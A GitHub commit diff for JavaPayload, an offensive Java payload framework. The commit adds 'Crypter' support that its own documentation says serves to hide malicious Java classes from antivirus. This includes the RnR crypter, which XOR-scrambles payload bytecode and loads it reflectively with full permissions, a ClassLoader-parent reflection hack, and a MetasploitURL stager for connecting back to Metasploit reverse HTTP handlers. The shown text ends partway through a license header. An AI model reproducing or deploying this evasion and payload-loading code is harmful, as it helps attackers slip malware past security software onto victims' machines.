Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Browse files

Merge branch 'svnmaster'

  • Loading branch information...
commit 20db88f94f853713425ccf76bd21d52477c4dee1 2 parents 6197202 + 7189ed8
Michael Schierl authored
13 J2EEPayload/src/j2eepayload/builder/JTCPfwdBuilder.java
View
@@ -39,15 +39,12 @@
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.FileOutputStream;
+import java.io.IOException;
import java.io.InputStream;
import java.io.PrintStream;
import java.net.Socket;
-import java.net.URL;
import java.security.AllPermission;
-import java.security.CodeSource;
import java.security.Permissions;
-import java.security.ProtectionDomain;
-import java.security.cert.Certificate;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.HashSet;
@@ -242,14 +239,12 @@ private String getEmbeddedClasses() {
}
private Map /*<String,byte[]>*/ classCache;
- private ProtectionDomain pd;
private boolean ready;
public void bootstrap(String[] parameters, boolean needWait) throws Exception {
final DataInputStream in = new DataInputStream(new ByteArrayInputStream(getEmbeddedClasses().getBytes("ISO-8859-1")));
final Permissions permissions = new Permissions();
permissions.add(new AllPermission());
- pd = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
classCache = new HashMap();
String className;
int length = in.readInt();
@@ -275,7 +270,11 @@ protected Class findClass(String name) throws ClassNotFoundException {
byte[] classfile = (byte[]) classCache.get(name);
if (classfile == null)
return super.findClass(name);
- return defineClass(null, classfile, 0, classfile.length, pd);
+ try {
+ return define(classfile);
+ } catch (IOException ex) {
+ throw new RuntimeException(ex.toString());
+ }
}
public synchronized void waitReady() throws InterruptedException {
32 JavaPayload/index.html
View
@@ -170,7 +170,10 @@
<p>This stage expects a stager and its arguments as parameters; this stager will be
launched from the stage handler and the sockets will be connected to the stage handler's sockets,
-making it possible to connect a ReverseTCP stager directly to a JDWPTunnel stager handler.</p>
+making it possible to connect a ReverseTCP stager directly to a JDWPTunnel stager handler.</p>
+
+<p>In case you want to use one of the <tt>java/*/reverse_http*</tt> payloads from Metasploit,
+you can use the <tt>MetasploitURL</tt> stager in JavaPayload to connect to them.</p>
<h2>Changes since version 0.2</h2>
@@ -193,6 +196,8 @@
<li>Make stager and stage handlers self-documenting modules, too.</li>
<li>Add support for self-documenting Discovery modules and provide AttachDiscovery as replacement for AttachInjector's list command</li>
<li>Add javapayload.cli.Main class.</li>
+<li>Add Crypter support.</li>
+<li>Add <tt>MetasploitURL</tt> stager</li>
</ul>
<h2>Changes since version 0.1</h2>
@@ -552,5 +557,30 @@
<p><b>On the "victim" machine:</b></p>
<p><tt>rmiregistry</tt> or <tt>rmid</tt></p>
+<h3>Crypter support</h3>
+
+<p>Due to the vast amount of Java malware, antivirus has improved in
+detecting "malicious" Java classes. Therefore, it is often necessary
+to crypt the classes to avoid AV detection. Javapayload contains very
+basic crypter support that can be used to crypt standalone main classes
+as well as the results of the <tt>ClassBuilder</tt> and
+<tt>EmbeddedClassBuilder</tt> and main classes generated by other stagers
+implicitly, like by the <tt>Spawn</tt> dynstager or the
+<tt>TemplateBuilder</tt>.</p>
+
+<p>The only crypter included is called <tt>RnR</tt>, because it uses
+Reflection and Randomization to conceal the class. You may alter this
+or create your own subclasses of <tt>javapayload.crypter.Crypter</tt>
+to improve the results.</p>
+
+<p>In the <tt>ClassBuilder</tt> and the <tt>EmbeddedClassBuilder</tt>, you
+can suffix a class name with <tt>^<i>Crypter</i></tt>, like
+<tt>MyClass^RnR</tt>. Or use the <tt>CrypterBuilder</tt> to crypt a main
+class you generated earlier. To automatically crypt all classes you are
+generating (explicitly or implicitly), set the system property
+<tt>javapayload.crypter</tt> like this:</p>
+
+<p><tt>java -Djavapayload.crypter=RnR <i>...</i></tt></p>
+
</body>
</html>
34 JavaPayload/src/javapayload/builder/ClassBuilder.java
View
@@ -39,7 +39,10 @@
import java.io.InputStream;
import java.io.OutputStream;
import java.io.UnsupportedEncodingException;
+import java.lang.reflect.Field;
+import javapayload.Module;
+import javapayload.crypter.Crypter;
import javapayload.loader.DynLoader;
import javapayload.stager.Stager;
@@ -54,15 +57,26 @@
public class ClassBuilder extends Builder {
- protected static void buildClass(final String classname, final String stager, Class loaderClass, final String embeddedArgs, String[] realArgs) throws Exception {
+ protected static void buildClass(String classname, final String stager, Class loaderClass, final String embeddedArgs, String[] realArgs) throws Exception {
final byte[] newBytecode = buildClassBytes(classname, stager, loaderClass, embeddedArgs, realArgs);
+ if (classname.indexOf('^') != -1)
+ classname = classname.substring(0, classname.indexOf('^'));
final FileOutputStream fos = new FileOutputStream(classname + ".class");
fos.write(newBytecode);
fos.close();
}
- public static byte[] buildClassBytes(final String classname, final String stager, Class loaderClass, final String embeddedArgs, String[] realArgs) throws Exception {
-
+ public static byte[] buildClassBytes(String classnameAndCrypter, final String stager, Class loaderClass, final String embeddedArgs, String[] realArgs) throws Exception {
+ final String crypter, classname, finalClassname;
+ int pos = classnameAndCrypter.indexOf('^');
+ if (pos != -1) {
+ finalClassname = classnameAndCrypter.substring(0, pos);
+ crypter = classnameAndCrypter.substring(pos+1);
+ } else {
+ finalClassname = classnameAndCrypter;
+ crypter = System.getProperty(CrypterBuilder.CRYPTER_PROPERTY);
+ }
+ classname = finalClassname + (crypter != null && crypter.length() > 0 ? "$" : "");
final ClassWriter writerThreadCW = new ClassWriter(0);
final ClassVisitor writerThreadVisitor = new ClassAdapter(writerThreadCW) {
@@ -225,7 +239,12 @@ public void visitOuterClass(String owner, String name, String desc) {
}
};
visitClass(loaderClass, loaderVisitor, cw);
- return cw.toByteArray();
+ byte[] result = cw.toByteArray();
+ if (crypter != null && crypter.length() > 0) {
+ Crypter c = (Crypter) Module.load(Crypter.class, crypter);
+ result = c.crypt(finalClassname, result);
+ }
+ return result;
}
public static void main(String[] args) throws Exception {
@@ -241,7 +260,7 @@ public ClassBuilder() {
}
public String getParameterSyntax() {
- return "<stager> [classname]";
+ return "<stager> [<classname>[^<crypter>]]";
}
public void build(String[] args) throws Exception {
@@ -275,6 +294,11 @@ public static void writeClassWithoutDebugInfo(InputStream in, OutputStream out)
public static void mainToEmbed(String[] args) throws Exception {
ClassBuilderTemplate cb = new ClassBuilderTemplate();
+ try {
+ Field f = Class.forName("java.lang.ClassLoader").getDeclaredField("parent");
+ f.setAccessible(true);
+ f.set(cb, cb.getClass().getClassLoader());
+ } catch (Throwable t) {}
boolean needWait = false;
if (args[0].startsWith("+")) {
args[0] = args[0].substring(1);
69 JavaPayload/src/javapayload/builder/CrypterBuilder.java
View
@@ -0,0 +1,69 @@
+/*
+ * Java Payloads.
+ *
+ * Copyright (c) 2012 Michael 'mihi' Schierl
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * - Redistributions of source code must retain the above copyright notice,
+ * this list of conditions and the following disclaimer.
+ *
+ * - Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * - Neither name of the copyright holders nor the names of its
+ * contributors may be used to endorse or promote products derived from
+ * this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.builder;
+
+import java.io.ByteArrayOutputStream;
+import java.io.FileInputStream;
+import java.io.FileOutputStream;
+
+import javapayload.Module;
+import javapayload.crypter.Crypter;
+import javapayload.stage.StreamForwarder;
+
+public class CrypterBuilder extends Builder {
+
+ public static final String CRYPTER_PROPERTY = "javapayload.crypter";
+
+ public CrypterBuilder() {
+ super("Crypt a standalone Class file", "");
+ }
+
+ public String getParameterSyntax() {
+ return "<inputClass> <outputClass> <crypter> | --set [<crypter>]";
+ }
+
+ public void build(String[] args) throws Exception {
+ if (args[0].equals("--set")) {
+ System.setProperty(CRYPTER_PROPERTY, args.length == 1 ? "" : args[1]);
+ } else {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ StreamForwarder.forward(new FileInputStream(args[0] + ".class"), baos);
+ FileOutputStream out = new FileOutputStream(args[1] + ".class");
+ Crypter crypter = (Crypter) Module.load(Crypter.class, args[2]);
+ out.write(crypter.crypt(args[1], baos.toByteArray()));
+ out.close();
+ }
+ }
+}
8 JavaPayload/src/javapayload/builder/EmbeddedClassBuilder.java
View
@@ -34,6 +34,7 @@
package javapayload.builder;
+import java.lang.reflect.Field;
import java.util.StringTokenizer;
import javapayload.stager.Stager;
@@ -57,7 +58,7 @@ public int getMinParameterCount() {
}
public String getParameterSyntax() {
- return "<classname> <stager> [stageroptions] -- <stage> [stageoptions]";
+ return "<classname>[^<crypter>] <stager> [stageroptions] -- <stage> [stageoptions]";
}
public void build(String[] args) throws Exception {
ClassBuilder.buildClass(args[0], args[1], EmbeddedClassBuilderTemplate.class, buildEmbeddedArgs(args), args);
@@ -77,6 +78,11 @@ public static String buildEmbeddedArgs(String[] args) {
public static class EmbeddedClassBuilderTemplate extends Stager {
public static void mainToEmbed(String[] args) throws Exception {
EmbeddedClassBuilderTemplate cb = new EmbeddedClassBuilderTemplate();
+ try {
+ Field f = Class.forName("java.lang.ClassLoader").getDeclaredField("parent");
+ f.setAccessible(true);
+ f.set(cb, cb.getClass().getClassLoader());
+ } catch (Throwable t) {}
boolean needWait = false;
if (args.length == 1 && args[0].equals("+")) {
args[0] = args[0].substring(1);
34 JavaPayload/src/javapayload/builder/dynstager/AES.java
View
@@ -38,14 +38,10 @@
import java.io.InputStream;
import java.io.OutputStream;
import java.io.PrintStream;
-import java.net.URL;
import java.security.AllPermission;
-import java.security.CodeSource;
import java.security.MessageDigest;
import java.security.Permissions;
-import java.security.ProtectionDomain;
import java.security.SecureRandom;
-import java.security.cert.Certificate;
import javapayload.handler.dynstager.SynchronizedOutputStream;
@@ -93,9 +89,8 @@ protected void bootstrapWrap(InputStream rawIn, OutputStream out, String[] param
ci.init(Cipher.DECRYPT_MODE, new SecretKeySpec(keyBytes, "AES"), new IvParameterSpec(inIV), sr);
final Permissions permissions = new Permissions();
permissions.add(new AllPermission());
- final ProtectionDomain pd = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
Class synchronizedOutputStreamClass;
- synchronizedOutputStreamClass = bootstrap(pd);
+ synchronizedOutputStreamClass = bootstrap();
OutputStream so = (OutputStream) synchronizedOutputStreamClass.getConstructor(new Class[] { Class.forName("java.io.OutputStream") }).newInstance(new Object[] { new CipherOutputStream(out, co) });
bootstrapOrig(new CipherInputStream(din, ci), so, newParameters);
} catch (final Throwable t) {
@@ -119,35 +114,20 @@ public void visit(int version, int access, String name, String signature, String
String classString = new String(cw2.toByteArray());
// create the bootstrap method
- MethodVisitor mv = cw.visitMethod(Opcodes.ACC_PRIVATE, bootstrapName, "(Ljava/security/ProtectionDomain;)Ljava/lang/Class;", null, new String[] { "java/lang/Exception" });
+ MethodVisitor mv = cw.visitMethod(Opcodes.ACC_PRIVATE, bootstrapName, "()Ljava/lang/Class;", null, new String[] { "java/lang/Exception" });
mv.visitCode();
+ mv.visitVarInsn(Opcodes.ALOAD, 0);
mv.visitLdcInsn(classString);
mv.visitLdcInsn("ISO-8859-1");
mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/lang/String", "getBytes", "(Ljava/lang/String;)[B");
- mv.visitVarInsn(Opcodes.ASTORE, 2);
- mv.visitVarInsn(Opcodes.ALOAD, 0);
- mv.visitInsn(Opcodes.ACONST_NULL);
- mv.visitVarInsn(Opcodes.ALOAD, 2);
- mv.visitInsn(Opcodes.ICONST_0);
- mv.visitVarInsn(Opcodes.ALOAD, 2);
- mv.visitInsn(Opcodes.ARRAYLENGTH);
- mv.visitVarInsn(Opcodes.ALOAD, 1);
- mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/lang/ClassLoader", "defineClass", "(Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;");
- mv.visitVarInsn(Opcodes.ASTORE, 3);
- mv.visitVarInsn(Opcodes.ALOAD, 0);
- mv.visitVarInsn(Opcodes.ALOAD, 3);
- mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "java/lang/ClassLoader", "resolveClass", "(Ljava/lang/Class;)V");
- mv.visitVarInsn(Opcodes.ALOAD, 3);
+ mv.visitMethodInsn(Opcodes.INVOKEVIRTUAL, "javapayload/stager/Stager", "define", "([B)Ljava/lang/Class;");
mv.visitInsn(Opcodes.ARETURN);
- mv.visitMaxs(6, 4);
+ mv.visitMaxs(3, 1);
mv.visitEnd();
}
- private Class bootstrap(ProtectionDomain pd) throws Exception {
+ private Class bootstrap() throws Exception {
throw new IllegalStateException("This method is replaced in the final stager");
- // byte[] classfile = "TO_BE_REPLACED".getBytes("ISO-8859-1");
- // Class clazz = defineClass(null, classfile, 0, classfile.length, pd);
- // resolveClass(clazz);
- // return clazz;
+ // return define("TO_BE_REPLACED".getBytes("ISO-8859-1"));
}
}
2  JavaPayload/src/javapayload/builder/dynstager/DynStagerBuilder.java
View
@@ -56,7 +56,7 @@
public abstract byte[] buildStager(String stagerName, Class baseStagerClass, String extraArg, String[] args) throws Exception;
- protected void visitStringConstant(MethodVisitor mv, String constant) {
+ public static void visitStringConstant(MethodVisitor mv, String constant) {
final List stringParts = new ArrayList();
final int MAXLEN = 65535;
while (constant.length() > MAXLEN || getUTFLen(constant) > MAXLEN) {
51 JavaPayload/src/javapayload/crypter/Crypter.java
View
@@ -0,0 +1,51 @@
+/*
+ * Java Payloads.
+ *
+ * Copyright (c) 2012 Michael 'mihi' Schierl
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * - Redistributions of source code must retain the above copyright notice,
+ * this list of conditions and the following disclaimer.
+ *
+ * - Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * - Neither name of the copyright holders nor the names of its
+ * contributors may be used to endorse or promote products derived from
+ * this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.crypter;
+
+import javapayload.Module;
+import javapayload.Parameter;
+
+public abstract class Crypter extends Module {
+
+ public Crypter(String summary, String description) {
+ super(null, Crypter.class, summary, description);
+ }
+
+ public final Parameter[] getParameters() {
+ throw new UnsupportedOperationException("Parameters not available for crypters");
+ }
+
+ public abstract byte[] crypt(String className, byte[] innerClassBytes) throws Exception;
+}
126 JavaPayload/src/javapayload/crypter/RnR.java
View
@@ -0,0 +1,126 @@
+/*
+ * Java Payloads.
+ *
+ * Copyright (c) 2012 Michael 'mihi' Schierl
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * - Redistributions of source code must retain the above copyright notice,
+ * this list of conditions and the following disclaimer.
+ *
+ * - Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * - Neither name of the copyright holders nor the names of its
+ * contributors may be used to endorse or promote products derived from
+ * this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.crypter;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.net.URL;
+import java.security.AllPermission;
+import java.security.CodeSource;
+import java.security.PermissionCollection;
+import java.security.Permissions;
+import java.security.ProtectionDomain;
+import java.security.cert.Certificate;
+import java.util.Random;
+
+public class RnR extends TemplateBasedCrypter {
+
+ public RnR() {
+ super("Reflection and Randomization", "");
+ }
+
+ protected byte[] generateReplaceData(String className, byte[] innerClassBytes, long seed) throws Exception {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(baos);
+
+ // line 2
+ oos.writeObject(new Object[] { null, new Object[] { null, innerClassBytes, new Integer(0), new Integer(innerClassBytes.length), null } });
+
+ // line 3
+ oos.writeUTF("java.net.URLClassLoader");
+ oos.writeObject(new Class[] { URL[].class });
+ oos.writeObject(new Object[] { new URL[0] });
+
+ // line 4
+ oos.writeUTF("java.security.ProtectionDomain");
+ oos.writeObject(new Class[] { CodeSource.class, PermissionCollection.class });
+ final Permissions permissions = new Permissions();
+ permissions.add(new AllPermission());
+ oos.writeObject(new Object[] { new CodeSource(new URL("file:///"), new Certificate[0]), permissions });
+
+ // line 5
+ oos.writeUTF("java.lang.ClassLoader");
+
+ // line 6
+ oos.writeUTF("java.lang.Class");
+ oos.writeUTF("getDeclaredMethod");
+ oos.writeObject(new Class[] { String.class, Class[].class });
+ oos.writeObject(new Object[] { "defineClass", new Class[] { String.class, byte[].class, int.class, int.class, ProtectionDomain.class } });
+
+ // line 7
+ oos.writeUTF("java.lang.reflect.Method");
+ oos.writeUTF("setAccessible");
+ oos.writeObject(new Class[] { boolean.class });
+ oos.writeObject(new Object[] { Boolean.TRUE });
+
+ // line 8
+ oos.writeUTF("java.lang.reflect.Method");
+ oos.writeUTF("invoke");
+ oos.writeObject(new Class[] { Object.class, Object[].class });
+
+ // line 9
+ oos.writeUTF("main");
+ oos.writeObject(new Class[] { String[].class });
+
+ oos.close();
+ byte[] result = baos.toByteArray();
+ Random r = new Random(seed);
+ for (int i = 0; i < result.length; i++) {
+ result[i] ^= r.nextInt(256);
+ }
+ return result;
+ }
+
+ public static void templateMain(String[] args) throws Exception {
+ byte[] data = "TO_BE_REPLACED".getBytes("ISO-8859-1");
+ Random r = new Random(4242L);
+ for (int i = 0; i < data.length; i++) {
+ data[i] ^= r.nextInt(256);
+ }
+ // line 1:
+ ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data));
+ Object[] arx = (Object[]) in.readObject();
+ arx[0] = Class.forName(in.readUTF()).getConstructor((Class[]) in.readObject()).newInstance((Object[]) in.readObject());
+ ((Object[]) arx[1])[4] = Class.forName(in.readUTF()).getConstructor((Class[]) in.readObject()).newInstance((Object[]) in.readObject());
+ Object _ClassLoader = Class.forName(in.readUTF());
+ // line 6:
+ Object mm = Class.forName(in.readUTF()).getMethod(in.readUTF(), (Class[]) in.readObject()).invoke(_ClassLoader, (Object[]) in.readObject());
+ Class.forName(in.readUTF()).getMethod(in.readUTF(), (Class[]) in.readObject()).invoke(mm, (Object[]) in.readObject());
+ Class clazz = (Class) Class.forName(in.readUTF()).getMethod(in.readUTF(), (Class[]) in.readObject()).invoke(mm, arx);
+ clazz.getMethod(in.readUTF(), (Class[]) in.readObject()).invoke(null, new Object[] { args });
+ }
+}
95 JavaPayload/src/javapayload/crypter/TemplateBasedCrypter.java
View
@@ -0,0 +1,95 @@
+/*
+ * Java Payloads.
+ *
+ * Copyright (c) 2012 Michael 'mihi' Schierl
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * - Redistributions of source code must retain the above copyright notice,
+ * this list of conditions and the following disclaimer.
+ *
+ * - Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * - Neither name of the copyright holders nor the names of its
+ * contributors may be used to endorse or promote products derived from
+ * this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.crypter;
+
+import java.security.SecureRandom;
+
+import javapayload.builder.ClassBuilder;
+import javapayload.builder.dynstager.DynStagerBuilder;
+
+import org.objectweb.asm.ClassAdapter;
+import org.objectweb.asm.ClassVisitor;
+import org.objectweb.asm.ClassWriter;
+import org.objectweb.asm.FieldVisitor;
+import org.objectweb.asm.MethodAdapter;
+import org.objectweb.asm.MethodVisitor;
+
+public abstract class TemplateBasedCrypter extends Crypter {
+
+ public TemplateBasedCrypter(String summary, String description) {
+ super(summary, description);
+ }
+
+ public byte[] crypt(final String className, byte[] innerClassBytes) throws Exception {
+ final long seed = new SecureRandom().nextLong();
+ final String replaceDataString = new String(generateReplaceData(className, innerClassBytes, seed), "ISO-8859-1");
+ final ClassWriter cw = new ClassWriter(0);
+ final ClassVisitor templateVisitor = new ClassAdapter(cw) {
+
+ public void visit(int version, int access, String name, String signature, String superName, String[] interfaces) {
+ super.visit(version, access, className, null, "java/lang/Object", null);
+ }
+
+ public MethodVisitor visitMethod(int access, String name, String desc, String signature, String[] exceptions) {
+ if (name.equals("templateMain")) {
+ return new MethodAdapter(super.visitMethod(access, "main", desc, signature, exceptions)) {
+ public void visitLdcInsn(Object cst) {
+ if ("TO_BE_REPLACED".equals(cst))
+ DynStagerBuilder.visitStringConstant(mv, replaceDataString);
+ else if (cst instanceof Long && ((Long) cst).longValue() == 4242)
+ super.visitLdcInsn(new Long(seed));
+ else
+ super.visitLdcInsn(cst);
+ };
+ };
+ }
+ return null;
+ }
+
+ public FieldVisitor visitField(int arg0, String arg1, String arg2, String arg3, Object arg4) {
+ return null;
+ }
+ };
+
+ ClassBuilder.visitClass(getClass(), templateVisitor, cw);
+ return cw.toByteArray();
+ }
+
+ protected abstract byte[] generateReplaceData(String className, byte[] innerClassBytes, long seed) throws Exception;
+
+ // subclasses must implement a method like this:
+ public static void templateMain(String[] args) throws Exception {
+ }
+}
66 JavaPayload/src/javapayload/handler/stager/MetasploitURL.java
View
@@ -0,0 +1,66 @@
+/*
+ * Java Payloads.
+ *
+ * Copyright (c) 2012 Michael 'mihi' Schierl
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * - Redistributions of source code must retain the above copyright notice,
+ * this list of conditions and the following disclaimer.
+ *
+ * - Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * - Neither name of the copyright holders nor the names of its
+ * contributors may be used to endorse or promote products derived from
+ * this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+package javapayload.handler.stager;
+
+import java.io.PrintStream;
+
+import javapayload.Parameter;
+import javapayload.handler.stage.StageHandler;
+
+public class MetasploitURL extends StagerHandler {
+
+ public MetasploitURL() {
+ super("Connect to Metasploit via URL", false, false,
+ "This stager is used to connect to a Metasploit handler with a\r\n" +
+ "reverse_http(s) stager.");
+ }
+
+ public Parameter[] getParameters() {
+ return new Parameter[] {
+ new Parameter("URL", false, Parameter.TYPE_URL, "URL to connect back to"),
+ };
+ }
+
+ protected void handle(StageHandler stageHandler, String[] parameters, PrintStream errorStream, Object extraArg, StagerHandler readyHandler) throws Exception {
+ throw new RuntimeException("MetasploitURL cannot be used as a handler");
+ }
+
+ protected boolean needHandleBeforeStart() {
+ throw new RuntimeException("MetasploitURL cannot be used as a standalone stager!");
+ }
+
+ protected String getTestArguments() {
+ return null;
+ }
+}
98 JavaPayload/src/javapayload/stager/MetasploitURL.java
View
@@ -0,0 +1,98 @@
+/*
+ * Java Payloads.
+ *
+ * Copyright (c) 2012 Michael 'mihi' Schierl
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * - Redistributions of source code must retain the above copyright notice,
+ * this list of conditions and the following disclaimer.
+ *
+ * - Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * - Neither name of the copyright holders nor the names of its
+ * contributors may be used to endorse or promote products derived from
+ * this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
